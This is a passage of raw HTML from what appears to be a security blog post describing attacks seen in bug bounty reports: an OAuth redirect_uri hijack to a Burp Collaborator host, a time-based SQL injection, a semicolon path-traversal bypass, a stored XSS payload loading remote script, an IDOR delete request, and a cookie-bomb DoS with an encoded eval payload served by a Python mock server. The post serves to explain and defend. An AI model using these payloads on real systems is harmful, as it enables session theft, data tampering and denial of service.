Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 0.86em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">This could be one of common attack scenario in user authentication workflows mainly the Oauth2 authentication flows where the users gets redirected to a specific url either for token exchange or to landing page of an application.</span></p><pre class="uw ux uy uz va vp vq vr bo vs ba bj" style="background: rgb(249, 249, 249); border-radius: 4px; border: 1px solid rgb(229, 229, 229); box-sizing: inherit; color: #242424; font-family: source-code-pro, Menlo, Monaco, "Courier New", Courier, monospace; margin-bottom: 0px; margin-top: 56px; overflow-x: auto; padding: 32px;"><span class="vt tj oa vq b bf vu vv l vw vx" data-selectable-paragraph="" id="182d" style="box-sizing: inherit; display: block; font-size: 14px; letter-spacing: -0.022em; line-height: 1.4; margin-bottom: -0.2em; margin-top: -0.2em; min-width: fit-content; text-wrap: wrap;">https://{{YOUR-AUTH_DOMAIN}}/openid-connect/auth?<br style="box-sizing: inherit;" /> client_id=authorization_code_flow<br style="box-sizing: inherit;" /> &redirect_uri=http://ua8j7t88q7ud3hz3f9tbja1nue05ou.burpcollaborator.net<br style="box-sizing: inherit;" /> &state=00350ec61-f32b-4ffa-9892-711521ddf152b<br style="box-sizing: inherit;" /> &response_mode=fragment<br style="box-sizing: inherit;" /> &response_type=code&scope=openid&nonce=60824a30-489-4819-9af-db8284fcd029</span></pre><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="0be9" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">In ideal scenario, the above url where authorisation code Oauth2 flow takes place to exchange session key with authorisation server for getting access token and then redirect to url. Here the hacker would change the redirect_uri to victim url <em class="vz" style="box-sizing: inherit;">“http://ua8j7t88q7ud3hz3f9tbja1nue05ou.burpcollaborator.net” </em>which is burp collaborator and it has the logic to extract the user session data.</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="0aac" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">Impact:</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="bde3" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">Open redirect can lead to several more serious vulnerabilities as exploited, in this case it can lead to the theft of the user’s session cookies, as it can go unnoticed and the same can’t see where your data is being redirected, giving the attacker access to any account including system administrators</span></p><h2 class="ti tj oa be tk tl tm tn to tp tq tr ts sv tt tu tv sz tw tx ty td tz ua ub uc bj" data-selectable-paragraph="" id="e2fb" style="background-color: white; box-sizing: inherit; color: #242424; font-family: sohne, "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 20px; line-height: 24px; margin: 1.72em 0px -0.31em;">SQL injection attack on the application tables</h2><p class="pw-post-body-paragraph sk sl oa sm b sn ud sp sq sr ue st su sv ug sx sy sz ui tb tc td uk tf tg th nu bj" data-selectable-paragraph="" id="081c" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 0.86em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">SQL injection is a very common attack every hackers would feel proud to find it :-) . An attacker can use SQL injection to bypass a web application’s authentication and authorisation mechanisms and retrieve the contents of an entire database.</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="e3fc" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">SQLi can also be used to add, modify and delete records in a database, affecting data integrity. Under the right circumstances, SQLi can also be used by an attacker to execute OS commands, which may then be used to escalate an attack even further.</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="843d" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">Here a sample SQL injection attack where the application query is vulnerable for executing a sleep command.</span></p><pre class="uw ux uy uz va vp vq vr bo vs ba bj" style="background: rgb(249, 249, 249); border-radius: 4px; border: 1px solid rgb(229, 229, 229); box-sizing: inherit; color: #242424; font-family: source-code-pro, Menlo, Monaco, "Courier New", Courier, monospace; margin-bottom: 0px; margin-top: 56px; overflow-x: auto; padding: 32px;"><span class="vt tj oa vq b bf vu vv l vy vx" data-selectable-paragraph="" id="7d86" style="box-sizing: inherit; display: block; font-size: 14px; letter-spacing: -0.022em; line-height: 1.4; margin-bottom: -0.2em; margin-top: -0.2em; min-width: fit-content;"><span class="hljs-keyword" style="box-sizing: inherit; color: #aa0d91;">GET</span> : <span class="hljs-operator" style="box-sizing: inherit;">/</span>{{your<span class="hljs-operator" style="box-sizing: inherit;">-</span>app<span class="hljs-operator" style="box-sizing: inherit;">-</span>path}}<span class="hljs-operator" style="box-sizing: inherit;">/</span>admin.php?action<span class="hljs-operator" style="box-sizing: inherit;">=</span><span class="hljs-keyword" style="box-sizing: inherit; color: #aa0d91;">get</span><span class="hljs-operator" style="box-sizing: inherit;">-</span>achievements<span class="hljs-operator" style="box-sizing: inherit;">&</span>total_only<span class="hljs-operator" style="box-sizing: inherit;">=</span><span class="hljs-literal" style="box-sizing: inherit; color: #aa0d91;">true</span><br style="box-sizing: inherit;" /> <span class="hljs-operator" style="box-sizing: inherit;">&</span>user_id<span class="hljs-operator" style="box-sizing: inherit;">=</span><span class="hljs-number" style="box-sizing: inherit; color: #1c00cf;">11</span><span class="hljs-operator" style="box-sizing: inherit;">%</span><span class="hljs-number" style="box-sizing: inherit; color: #1c00cf;">20</span><span class="hljs-keyword" style="box-sizing: inherit; color: #aa0d91;">AND</span><span class="hljs-operator" style="box-sizing: inherit;">%</span><span class="hljs-number" style="box-sizing: inherit; color: #1c00cf;">20</span>(<span class="hljs-keyword" style="box-sizing: inherit; color: #aa0d91;">SELECT</span><span class="hljs-operator" style="box-sizing: inherit;">%</span><span class="hljs-number" style="box-sizing: inherit; color: #1c00cf;">209628</span><span class="hljs-operator" style="box-sizing: inherit;">%</span><span class="hljs-number" style="box-sizing: inherit; color: #1c00cf;">20</span><span class="hljs-keyword" style="box-sizing: inherit; color: #aa0d91;">FROM</span><span class="hljs-operator" style="box-sizing: inherit;">%</span><span class="hljs-number" style="box-sizing: inherit; color: #1c00cf;">20</span>(<span class="hljs-keyword" style="box-sizing: inherit; color: #aa0d91;">SELECT</span>(SLEEP(<span class="hljs-number" style="box-sizing: inherit; color: #1c00cf;">15</span>)))WOrh)<span class="hljs-comment" style="box-sizing: inherit; color: #007400;">--%20KUsb</span><br style="box-sizing: inherit;" /> HTTP<span class="hljs-operator" style="box-sizing: inherit;">/</span><span class="hljs-number" style="box-sizing: inherit; color: #1c00cf;">2</span></span></pre><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="8fe8" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">In the above url, hacker has replaced user_id with a vulnerable SQL sleep command and if your application code is vulnerable for sql injection you will see that response of above GET endpoint would take 15 seconds.</span></p><h2 class="ti tj oa be tk tl tm tn to tp tq tr ts sv tt tu tv sz tw tx ty td tz ua ub uc bj" data-selectable-paragraph="" id="e671" style="background-color: white; box-sizing: inherit; color: #242424; font-family: sohne, "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 20px; line-height: 24px; margin: 1.72em 0px -0.31em;">Path traversal attack on admin directories</h2><p class="pw-post-body-paragraph sk sl oa sm b sn ud sp sq sr ue st su sv ug sx sy sz ui tb tc td uk tf tg th nu bj" data-selectable-paragraph="" id="1ea8" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 0.86em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">I noticed that this hack was targeted my many hackers. This hack was mainly on the admin screen where the files and folders are protected with non-public access.</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="52ba" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">Let us take the below sample url which takes us to admin console</span></p><pre class="uw ux uy uz va vp vq vr bo vs ba bj" style="background: rgb(249, 249, 249); border-radius: 4px; border: 1px solid rgb(229, 229, 229); box-sizing: inherit; color: #242424; font-family: source-code-pro, Menlo, Monaco, "Courier New", Courier, monospace; margin-bottom: 0px; margin-top: 56px; overflow-x: auto; padding: 32px;"><span class="vt tj oa vq b bf vu vv l vw vx" data-selectable-paragraph="" id="60f2" style="box-sizing: inherit; display: block; font-size: 14px; letter-spacing: -0.022em; line-height: 1.4; margin-bottom: -0.2em; margin-top: -0.2em; min-width: fit-content; text-wrap: wrap;">https://{{YOUR_DOMAIN}}/auth/admin/master/console/config</span></pre><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="6aff" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">If we try to access the url, you will get 403- forbidden. As a hack add the semicolon (;) after the word of admin. ex: <a class="af vo" href="https://%7B%7Byour_domain%7D%7D/auth/admin;/master/console/config" rel="noopener ugc nofollow" style="-webkit-tap-highlight-color: transparent; box-sizing: inherit;" target="_blank">https://{{YOUR_DOMAIN}}/auth/<span class="sm jr" style="box-sizing: inherit; font-weight: 700;">admin;</span>/master/console/config</a></span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="317d" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">then you will see that now you could access all the files. Of course now this url is vulnerable for path traversal attack.</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="dee1" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">In the scenarios where the directory name getting passed in the request headers, then it can be bypassed using <span class="sm jr" style="box-sizing: inherit; font-weight: 700;">burp suite</span> “<span class="sm jr" style="box-sizing: inherit; font-weight: 700;">match” and “replace”</span> of utilities (<a class="af vo" href="https://portswigger.net/burp/documentation/desktop/tutorials/using-match-and-replace" rel="noopener ugc nofollow" style="-webkit-tap-highlight-color: transparent; box-sizing: inherit;" target="_blank">https://portswigger.net/burp/documentation/desktop/tutorials/using-match-and-replace</a>)</span></p><h2 class="ti tj oa be tk tl tm tn to tp tq tr ts sv tt tu tv sz tw tx ty td tz ua ub uc bj" data-selectable-paragraph="" id="9644" style="background-color: white; box-sizing: inherit; color: #242424; font-family: sohne, "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 20px; line-height: 24px; margin: 1.72em 0px -0.31em;">Stored XSS — POST request</h2><p class="pw-post-body-paragraph sk sl oa sm b sn ud sp sq sr ue st su sv ug sx sy sz ui tb tc td uk tf tg th nu bj" data-selectable-paragraph="" id="24a9" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 0.86em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">This is one of variant of stored XSS which hackers tried in different API instances. In the example below we are making POST request to an user authentication API and storing the user info with malicious XSS payloads.</span></p><pre class="uw ux uy uz va vp vq vr bo vs ba bj" style="background: rgb(249, 249, 249); border-radius: 4px; border: 1px solid rgb(229, 229, 229); box-sizing: inherit; color: #242424; font-family: source-code-pro, Menlo, Monaco, "Courier New", Courier, monospace; margin-bottom: 0px; margin-top: 56px; overflow-x: auto; padding: 32px;"><span class="vt tj oa vq b bf vu vv l vy vx" data-selectable-paragraph="" id="b0ee" style="box-sizing: inherit; display: block; font-size: 14px; letter-spacing: -0.022em; line-height: 1.4; margin-bottom: -0.2em; margin-top: -0.2em; min-width: fit-content;"><br style="box-sizing: inherit;" />POST /api/Authentication/AuthenticateUser HTTP/2<br style="box-sizing: inherit;" /><span class="hljs-section" style="box-sizing: inherit; color: #643820;">Host: bugbounty-is.bugbounty.com:553</span><br style="box-sizing: inherit;" /><span class="hljs-section" style="box-sizing: inherit; color: #643820;">Content-Type: application/json; charset=utf-8</span><br style="box-sizing: inherit;" /><span class="hljs-section" style="box-sizing: inherit; color: #643820;">Cookie: ASP.NET_SessionId=25jqpkfplyfwwgkt5hxqhjtu; Guid=bc5308-e597-4145-a62b-81523236f9dd</span><br style="box-sizing: inherit;" /><span class="hljs-section" style="box-sizing: inherit; color: #643820;">Content-Length: 263</span><br style="box-sizing: inherit;" /><br style="box-sizing: inherit;" />{ <br style="box-sizing: inherit;" /> <span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">"UserName"</span>:<span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">"username"</span>,<br style="box-sizing: inherit;" /><span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">"P assword"</span>:<span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">"password"</span>,<br style="box-sizing: inherit;" /><span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">"Device"</span>:<span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">"PC'\"><script src=https://ls.bxss.in/>.techlabcorp.local"</span><br style="box-sizing: inherit;" />}</span></pre><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="c17f" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">The next time when the users login into the application, the XSS payload is getting executed in the application.</span></p><h2 class="ti tj oa be tk tl tm tn to tp tq tr ts sv tt tu tv sz tw tx ty td tz ua ub uc bj" data-selectable-paragraph="" id="7080" style="background-color: white; box-sizing: inherit; color: #242424; font-family: sohne, "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 20px; line-height: 24px; margin: 1.72em 0px -0.31em;">IDOR attack — Chat box conversation scenario</h2><p class="pw-post-body-paragraph sk sl oa sm b sn ud sp sq sr ue st su sv ug sx sy sz ui tb tc td uk tf tg th nu bj" data-selectable-paragraph="" id="83dd" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 0.86em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">I noticed few hackers attempted IDOR attack ( Insecure direct object references ) mainly in the scenario where you have chat conversation features.</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="cfb4" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">In the example below, a hacker has attempted to delete other user chats in a chat group and was able to succeed with IDOR attack.</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="4c61" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">Here is an example of DELETE request which accepts 2 url params “chat_id” and “message_id”</span></p><pre class="uw ux uy uz va vp vq vr bo vs ba bj" style="background: rgb(249, 249, 249); border-radius: 4px; border: 1px solid rgb(229, 229, 229); box-sizing: inherit; color: #242424; font-family: source-code-pro, Menlo, Monaco, "Courier New", Courier, monospace; margin-bottom: 0px; margin-top: 56px; overflow-x: auto; padding: 32px;"><span class="vt tj oa vq b bf vu vv l vy vx" data-selectable-paragraph="" id="a845" style="box-sizing: inherit; display: block; font-size: 14px; letter-spacing: -0.022em; line-height: 1.4; margin-bottom: -0.2em; margin-top: -0.2em; min-width: fit-content;"><span class="hljs-variable.constant" style="box-sizing: inherit;">DELETE</span> /chat/threads/<chat_id><span class="hljs-regexp" style="box-sizing: inherit; color: #0e0eff;">/messages/</span><message_id> <span class="hljs-variable.constant" style="box-sizing: inherit;">HTTP</span>/<span class="hljs-number" style="box-sizing: inherit; color: #1c00cf;">2</span></span></pre><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="acea" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">The hacker who knows the chat group ID can try with random or sequence message ID’s of other users chats and able to successfully delete other users chat messages due to insecure direct references of object.</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="326f" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">Look at the below sample payload where the message_id(guessed based on sequence) is the other user message.</span></p><pre class="uw ux uy uz va vp vq vr bo vs ba bj" style="background: rgb(249, 249, 249); border-radius: 4px; border: 1px solid rgb(229, 229, 229); box-sizing: inherit; color: #242424; font-family: source-code-pro, Menlo, Monaco, "Courier New", Courier, monospace; margin-bottom: 0px; margin-top: 56px; overflow-x: auto; padding: 32px;"><span class="vt tj oa vq b bf vu vv l vy vx" data-selectable-paragraph="" id="8f4e" style="box-sizing: inherit; display: block; font-size: 14px; letter-spacing: -0.022em; line-height: 1.4; margin-bottom: -0.2em; margin-top: -0.2em; min-width: fit-content;">DELETE /chat/threads/19%3AMqmTpSDKj-121asdSDFsdsAA21%40thread.v1/messages/1653045685393 HTTP/2<br style="box-sizing: inherit;" />Host: yourdomain.com<br style="box-sizing: inherit;" />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0<br style="box-sizing: inherit;" />Accept: application/json<br style="box-sizing: inherit;" />Accept-Language: en-US,en;q=0.5<br style="box-sizing: inherit;" />Accept-Encoding: gzip, deflate<br style="box-sizing: inherit;" />Authorization: Bearer Access_Token<br style="box-sizing: inherit;" />Origin: yourdomain.com<br style="box-sizing: inherit;" />Referer: yourdomain.com<br style="box-sizing: inherit;" />Sec-Fetch-Dest: empty<br style="box-sizing: inherit;" />Sec-Fetch-Mode: cors<br style="box-sizing: inherit;" />Sec-Fetch-Site: cross-site<br style="box-sizing: inherit;" />X-Pwnfox-Color: blue</span></pre><h2 class="ti tj oa be tk tl tm tn to tp tq tr ts sv tt tu tv sz tw tx ty td tz ua ub uc bj" data-selectable-paragraph="" id="627e" style="background-color: white; box-sizing: inherit; color: #242424; font-family: sohne, "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 20px; line-height: 24px; margin: 1.72em 0px -0.31em;">DOM XSS and Cookie Bomb attack</h2><p class="pw-post-body-paragraph sk sl oa sm b sn ud sp sq sr ue st su sv ug sx sy sz ui tb tc td uk tf tg th nu bj" data-selectable-paragraph="" id="c8aa" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 0.86em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">I saw many hackers reported different flavour of DOM XSS attack where the UI lacks sanitisation. This attack is taking advantage of DOM XSS and exploit with Cookie Bomb attack and at the end succeeding with kind of Denial of service.</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="03c5" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">A cookie bomb is the capability of adding a large number of large cookies to a user for a domain and its subdomains with the goal that the victim will always send large HTTP requests to the server (due to the cookies) the server won’t accept the request. Therefore, this will cause a DoS over a user in that domain and subdomains.</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="47de" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">Below is the snippet for a sample cookie bomb. This script and can be converted to base64 and injected in the mock service GET response.</span></p><pre class="uw ux uy uz va vp vq vr bo vs ba bj" style="background: rgb(249, 249, 249); border-radius: 4px; border: 1px solid rgb(229, 229, 229); box-sizing: inherit; color: #242424; font-family: source-code-pro, Menlo, Monaco, "Courier New", Courier, monospace; margin-bottom: 0px; margin-top: 56px; overflow-x: auto; padding: 32px;"><span class="vt tj oa vq b bf vu vv l vy vx" data-selectable-paragraph="" id="f014" style="box-sizing: inherit; display: block; font-size: 14px; letter-spacing: -0.022em; line-height: 1.4; margin-bottom: -0.2em; margin-top: -0.2em; min-width: fit-content;"><span class="hljs-tag" style="box-sizing: inherit; color: #aa0d91;"><<span class="hljs-name" style="box-sizing: inherit;">script</span>></span><span class="hljs-undefined" style="box-sizing: inherit;"><br style="box-sizing: inherit;" />var base_domain = document.domain.substr(document.domain.indexOf('.'));<br style="box-sizing: inherit;" />var pollution = Array(4000).join('a');<br style="box-sizing: inherit;" />for(var i=1;i<99;i++){<br style="box-sizing: inherit;" /> document.cookie='bomb'+i+'='+pollution+';Domain='+base_domain;<br style="box-sizing: inherit;" />}<br style="box-sizing: inherit;" /></span><span class="hljs-tag" style="box-sizing: inherit; color: #aa0d91;"></<span class="hljs-name" style="box-sizing: inherit;">script</span>></span></span></pre><pre class="wa vp vq vr bo vs ba bj" style="background: rgb(249, 249, 249); border-radius: 4px; border: 1px solid rgb(229, 229, 229); box-sizing: inherit; color: #242424; font-family: source-code-pro, Menlo, Monaco, "Courier New", Courier, monospace; margin-bottom: 0px; margin-top: 16px; overflow-x: auto; padding: 32px;"><span class="vt tj oa vq b bf vu vv l vy vx" data-selectable-paragraph="" id="d72a" style="box-sizing: inherit; display: block; font-size: 14px; letter-spacing: -0.022em; line-height: 1.4; margin-bottom: -0.2em; margin-top: -0.2em; min-width: fit-content;"><span class="hljs-keyword" style="box-sizing: inherit; color: #aa0d91;">import</span> ast<br style="box-sizing: inherit;" /><span class="hljs-keyword" style="box-sizing: inherit; color: #aa0d91;">import</span> json<br style="box-sizing: inherit;" /><span class="hljs-keyword" style="box-sizing: inherit; color: #aa0d91;">from</span> http.server <span class="hljs-keyword" style="box-sizing: inherit; color: #aa0d91;">import</span> HTTPServer, BaseHTTPRequestHandler<br style="box-sizing: inherit;" /><span class="hljs-keyword" style="box-sizing: inherit; color: #aa0d91;">from</span> http <span class="hljs-keyword" style="box-sizing: inherit; color: #aa0d91;">import</span> HTTPStatus<br style="box-sizing: inherit;" /><span class="hljs-keyword" style="box-sizing: inherit; color: #aa0d91;">import</span> ssl<br style="box-sizing: inherit;" /><br style="box-sizing: inherit;" /><span class="hljs-keyword" style="box-sizing: inherit; color: #aa0d91;">class</span> <span class="hljs-title.class" style="box-sizing: inherit;">ServiceHandler</span>(<span class="hljs-title.class.inherited" style="box-sizing: inherit;">BaseHTTPRequestHandler</span>):<br style="box-sizing: inherit;" /><br style="box-sizing: inherit;" /> <span class="hljs-keyword" style="box-sizing: inherit; color: #aa0d91;">def</span> <span class="hljs-title.function" style="box-sizing: inherit;">do_GET</span>(<span class="hljs-params" style="box-sizing: inherit; color: #5c2699;">self</span>):<br style="box-sizing: inherit;" /> response= <span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">'[{"mediaName": "<img src=x onerror=eval(atob(\'dmFyIGJhc2VfZG9tYWluID0gZG9jdW1lbnQuZG9tYWluLnN1YnN0cihkb2N1bWVudC5kb21haW4uaW5kZXhPZignLicpKTsKdmFyIHBvbGx1dGlvbiA9IEFycmF5KDQwMDApLmpvaW4oJ2EnKTsKZm9yKHZhciBpPTE7aTw5OTtpKyspewogICAgZG9jdW1lbnQuY29va2llPSdib21iJytpKyc9Jytwb2xsdXRpb24rJztEb21haW49JytiYXNlX2RvbWFpbjsKfQ==\'))><h1>Cr33sspb0sy</h1>" }]'</span><br style="box-sizing: inherit;" /> self.send_response(<span class="hljs-number" style="box-sizing: inherit; color: #1c00cf;">200</span>)<br style="box-sizing: inherit;" /> self.send_header(<span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">'Access-Control-Allow-Origin'</span>, <span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">'*'</span>)<br style="box-sizing: inherit;" /> self.send_header(<span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">'Content-type'</span>, <span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">'application/json'</span>)<br style="box-sizing: inherit;" /> self.end_headers()<br style="box-sizing: inherit;" /> self.wfile.write(<span class="hljs-built_in" style="box-sizing: inherit; color: #5c2699;">bytes</span>(response,<span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">'utf-8'</span>))<br style="box-sizing: inherit;" /><br style="box-sizing: inherit;" /><span class="hljs-comment" style="box-sizing: inherit; color: #007400;">#Server Initialization</span><br style="box-sizing: inherit;" />server = HTTPServer((<span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">''</span>,<span class="hljs-number" style="box-sizing: inherit; color: #1c00cf;">8080</span>), ServiceHandler)<br style="box-sizing: inherit;" /><br style="box-sizing: inherit;" />server.socket = ssl.wrap_socket(server.socket, keyfile=<span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">"key.pem"</span>, certfile=<span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">"cert.pem"</span>)<br style="box-sizing: inherit;" />server.serve_forever()</span></pre><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="632a" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">Run the above mock service and assume it is accessible via <a class="af vo" href="https://194.163.184.122:8080/" rel="noopener ugc nofollow" style="-webkit-tap-highlight-color: transparent; box-sizing: inherit;" target="_blank">https://{{</a><a class="af vo" href="https://%7B%7Byour_domain%7D%7D/lo/reset?ticket=23G23P1W237MrLBGSW&redirect_uri=google.comB%3FmediaUrl%3Dhttps%3A%2F%2F%7B%7BMOCK_VICTIM_SERVICE_IP%7D%7D%3A8080" rel="noopener ugc nofollow" style="-webkit-tap-highlight-color: transparent; box-sizing: inherit;" target="_blank">MOCK_VICTIM_SERVICE_IP</a><a class="af vo" href="https://194.163.184.122:8080/" rel="noopener ugc nofollow" style="-webkit-tap-highlight-color: transparent; box-sizing: inherit;" target="_blank">}}:8080</a></span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="f8db" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 